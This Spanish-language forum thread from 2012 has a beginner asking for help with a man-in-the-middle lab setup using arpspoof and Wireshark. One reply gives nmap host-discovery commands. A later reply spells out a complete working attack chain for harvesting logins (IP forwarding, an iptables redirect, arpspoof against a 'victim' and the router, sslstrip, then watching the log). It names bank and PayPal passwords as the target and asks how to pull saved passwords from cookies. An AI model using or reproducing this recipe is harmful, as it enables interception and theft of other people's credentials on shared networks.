ayuda con man in the middle

Iniciado por mitroll025, 13 Febrero 2012, 22:30 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

mitroll025

13 Febrero 2012, 22:30 PM
buenas buenas! tengo un pequeño problema jeje a
ver si me pueden ayudar en algo--
primero voy a decirles como es que estoy tratando
de probar esto del Man in the middle, tengo 2 pc`s
con xp, ambas conectadas a un router y en una de
ellas tengo una maquina virtual con ubuntu.ok? bien ahora siguiendo los pasos de el pdf (MITM) que publicaron en este foro
hay una explicacion de 4 pasos:
1-sudo nano /proc/sys/net/ipv4/ip_forward
Cambiamos el 0 por 1
2-sudo wireshark –i [interface]
3-sudo arpspoof -i [interface] -t [ip_objetivo] [ip_router]
4-sudo arpspoof –i [interface] –t [ip_router]
[ip_objetivo]
en el paso 1 esta todo bien cambio los valores y
listo
ahora en el paso 2 mi duda esta en donde introduzco el comando sudo wireshark –i
[interface]  perdón por mi ignorancia pero en el
lugar de interface debo poner por ejemplo "etho" o
"lo" ??esa es mi primera duda en tal caso yo puse
"lo"
ahora en el paso 3 y 4 ingreso los comandos (ahi capaz arrastro el error del paso anterior donde dice
interface puse "lo") y me da este error.
"arpspoof : couldn`t arp for host 192.168.x.x "
si pudieran sacarme de este aprieto se los
agradeceria..
p/d: otra cosa en una parte del pdf dice "Para ver las direcciones IP que están conectadas a nuestra
red, podemos entrar a nuestro router desde el
navegador"
yo entre en el mio es un d-link y no hay un panel
de control ni una opcion para ver las pc conectadas
entre al router desde el navegador y solo me da opciones para cambiar algunas configuraciones
como por ejem la contraseña del wifi.
Un millon de gracias..

MauroMasciar

#1
13 Febrero 2012, 22:39 PM
Citarahora en el paso 2 mi duda esta en donde introduzco el comando sudo wireshark –i
[interface]  perdón por mi ignorancia pero en el
lugar de interface debo poner por ejemplo "etho" o
"lo" ??

Te falta un poco de teoria de Linux y las redes...
Puede ser eth0 eth1 wlan0 etc...
El comando lo metes en la terminal, obviamente...

Citarahora en el paso 3 y 4 ingreso los comandos (ahi capaz arrastro el error del paso anterior donde dice
interface puse "lo") y me da este error.
No, no es asi, como dije, necesitas leer un poco mas, aprende que es lo, eth0, wlan0, etc...

Citarp/d: otra cosa en una parte del pdf dice "Para ver las direcciones IP que están conectadas a nuestra
red, podemos entrar a nuestro router desde el
navegador"

Podes usar NMAP:

nmap -sP 192.168.1.1-255
nmap -sP -PI 192.168.1.1-255
Tutto ha oceani da attraversare mentre hanno il coraggio di farlo Avventato? Ma sanno sogni di limiti

Twitter: @MauroMasciar

mitroll025

#2
13 Febrero 2012, 23:11 PM
muchas gracias por la respuesta!!!y si es verdad estoy bastante verde todavia...tendre que leer mas..gracias por la ayuda..

ps3ps3ps3

#3
13 Febrero 2012, 23:49 PM
Te explico como lo hago yo en Ubuntu 11.10 facil facil,Instalo aircrack,dsniff y sslstrip 0.9 (asi ves contraseñas sin cifrar y cifradas,http y https,bancos online,paypal,etc...)

Cuando lo tengas instalado,pones la terminal y añades : echo 1 > /proc/sys/net/ipv4/ip_forward

Luego añades: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Luego: arpspoof -i eth0/wlan0 -t IPVICTIMA IPROUTER y empezara el "ataque"

Ahora abres otra terminal sin cerrar la de antes y pones: sslstrip -w  nombredetuarchivo

Aqui empezara sslstrip 0.9 (sslstrip da el cambiazo a la victima que pide una pagina https,le da el cambiazo por la misma en http y ves la contraseña sin cifrar)

Luego para ver el ataque en "vivo" abre otra terminal,sin cerrar la de antes,y pones:

tail -f nombredetuarchivo y cuando al cvictima se meta en alguna pagina te saldra,tambien puedes poner en vez de tail -f,el wireshark,aunque para mi es un poco lioso.

Asi lo hago yo y me va de lujo,prueba contigo mismo y veras como te sale.

Aprovecho para hacer una pregunta,sabreis como hacer para pillar una pass y user que esta alojada en las cookies? una contraseña recordada vamos,osea hacer un mitm a mi mismo y verme mi pass en una pagina de logueo automatico,Gracias y saludos.

MauroMasciar

#4
14 Febrero 2012, 00:25 AM
Cita de: ps3ps3ps3 en 13 Febrero 2012, 23:49 PM
el wireshark,aunque para mi es un poco lioso.

Aprovecho para hacer una pregunta,sabreis como hacer para pillar una pass y user que esta alojada en las cookies? una contraseña recordada vamos,osea hacer un mitm a mi mismo y verme mi pass en una pagina de logueo automatico,Gracias y saludos.

Una vez que entendes el wireshark no es tan lioso...
Y diria que hagas un nuevo post y no desvirtues el tema de nuestro amigo  :silbar:
Tutto ha oceani da attraversare mentre hanno il coraggio di farlo Avventato? Ma sanno sogni di limiti

Twitter: @MauroMasciar
Imprimir
Ir Arriba Páginas1
Acciones del Usuario